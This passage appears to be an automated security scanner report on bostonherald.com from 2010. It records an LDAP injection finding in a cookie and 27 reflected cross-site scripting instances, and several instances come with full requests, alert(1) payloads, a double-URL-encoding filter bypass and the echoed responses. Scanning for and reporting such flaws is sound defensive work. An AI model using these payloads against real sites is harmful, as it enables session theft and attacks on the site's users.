The OAX cookie appears to be vulnerable to LDAP injection attacks.

The payloads c93cc7a8810fe7b9)(sn=* and c93cc7a8810fe7b9)!(sn=* were each submitted in the OAX cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /index.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=c93cc7a8810fe7b9)(sn=*; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response 1

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 10:43:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 152345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



</div>
    </div>

</div>














<div id="containerMid">


<div id="containerMidThree" style="margin-top: 0px" >
<div id="containerMidThreeInner">



...[SNIP]...

Request 2

GET /index.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=c93cc7a8810fe7b9)!(sn=*; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response 2

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 10:43:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 151825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



</div>
    </div>

</div>














<div id="containerMid">


<div id="containerMidThree" style="margin-top: 0px" >
<div id="containerMidThreeInner">



...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 27 instances of this issue:

/includes/processAds.bg [companion parameter]
/includes/processAds.bg [companion parameter]
/includes/processAds.bg [page parameter]
/includes/processAds.bg [page parameter]
/includes/processAds.bg [position parameter]
/includes/processAds.bg [position parameter]
/mediacenter/ [name of an arbitrarily supplied request parameter]
/mediacenter/index.php [media_type_photo parameter]
/mediacenter/index.php [media_type_photo parameter]
/mediacenter/index.php [media_type_video parameter]
/mediacenter/index.php [media_type_video parameter]
/mediacenter/index.php [name of an arbitrarily supplied request parameter]
/mediacenter/video.php [height parameter]
/mediacenter/video.php [media_id parameter]
/mediacenter/video.php [program_id parameter]
/mediacenter/video.php [program_id parameter]
/mediacenter/video.php [src parameter]
/mediacenter/video.php [title parameter]
/mediacenter/video.php [width parameter]
/news/columnists/view.bg [format parameter]
/news/document.bg [f parameter]
/news/document.bg [h parameter]
/news/regional/view.bg [format parameter]
/search/ [topic parameter]
/search/ [topic parameter]
/sports/football/patriots/view.bg [format parameter]
/sports/football/patriots/view.bg [format parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://bostonherald.com/includes/processAds.bg [companion parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99318</script><script>alert(1)</script>e0201f2d5a4 was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom99318</script><script>alert(1)</script>e0201f2d5a4&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2058
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom99318</script><script>alert(1)</script>e0201f2d5a4!Top">
...[SNIP]...

2.2. http://bostonherald.com/includes/processAds.bg [companion parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f85d0"><script>alert(1)</script>5038fb52a5f was submitted in the companion parameter. This input was echoed as f85d0\"><script>alert(1)</script>5038fb52a5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottomf85d0"><script>alert(1)</script>5038fb52a5f&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2022
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottomf85d0\"><script>alert(1)</script>5038fb52a5f!Top">
...[SNIP]...

2.3. http://bostonherald.com/includes/processAds.bg [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbc2b"><script>alert(1)</script>b0be5ee5a8c was submitted in the page parameter. This input was echoed as cbc2b\"><script>alert(1)</script>b0be5ee5a8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhomecbc2b"><script>alert(1)</script>b0be5ee5a8c HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2022
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/homecbc2b\"><script>alert(1)</script>b0be5ee5a8c@Top,Middle,Middle1,Bottom!Top">
...[SNIP]...

2.4. http://bostonherald.com/includes/processAds.bg [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 396d4%2527%253balert%25281%2529%252f%252fe57802ac0a0 was submitted in the page parameter. This input was echoed as 396d4';alert(1)//e57802ac0a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome396d4%2527%253balert%25281%2529%252f%252fe57802ac0a0 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 1926
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home396d4';alert(1)//e57802ac0a0@Top,Middle,Middle1,Bottom!Top">
...[SNIP]...

2.5. http://bostonherald.com/includes/processAds.bg [position parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30e13</script><script>alert(1)</script>1c8d3b711d6 was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes/processAds.bg?position=Top30e13</script><script>alert(1)</script>1c8d3b711d6&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2053
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
EBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top30e13</script><script>alert(1)</script>1c8d3b711d6">
...[SNIP]...

2.6. http://bostonherald.com/includes/processAds.bg [position parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5383e"><script>alert(1)</script>c79e43a946d was submitted in the position parameter. This input was echoed as 5383e\"><script>alert(1)</script>c79e43a946d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top5383e"><script>alert(1)</script>c79e43a946d&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC; OAX=rnoX2kzXQXwACWRq; bhpopup=on; RMFD=011PFFPzO101yed8; __utmz=235728274.1289175424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1292731211-1289175424376; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.11.10.1289175424; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 00:32:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2017
Content-Type: text/html; charset=UTF-8
Connection: close

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top5383e\"><script>alert(1)</script>c79e43a946d">
...[SNIP]...

2.7. http://bostonherald.com/mediacenter/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae3bb'-alert(1)-'395ad40a18f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/?ae3bb'-alert(1)-'395ad40a18f=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 03:23:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 439703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<script type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;

            // Converts the GET params to a JSON object
               mcParams = 'ae3bb'-alert(1)-'395ad40a18f=1'.toQueryParams();

               //alert(Object.inspect(mcParams));

               function updateData(key,val) {

                   // update paramaters JSON
                   mcParams[key] = val;

                   // Show loadi
...[SNIP]...

2.8. http://bostonherald.com/mediacenter/index.php [media_type_photo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/mediacenter/index.php

Issue detail

The value of the media_type_photo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9268d'-alert(1)-'f2ec1eda6c3 was submitted in the media_type_photo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mediacenter/index.php?media_type_photo=09268d'-alert(1)-'f2ec1eda6c3&media_type_video=1&media_type_audio=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:36:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 323072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<script type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;

            // Converts the GET params to a JSON object
               mcParams = 'media_type_photo=09268d'-alert(1)-'f2ec1eda6c3&media_type_video=1&media_type_audio=0'.toQueryParams();

               //alert(Object.inspect(mcParams));

               function updateData(key,val) {

                   // update paramaters JSON
                   mcParams[ke
...[SNIP]...

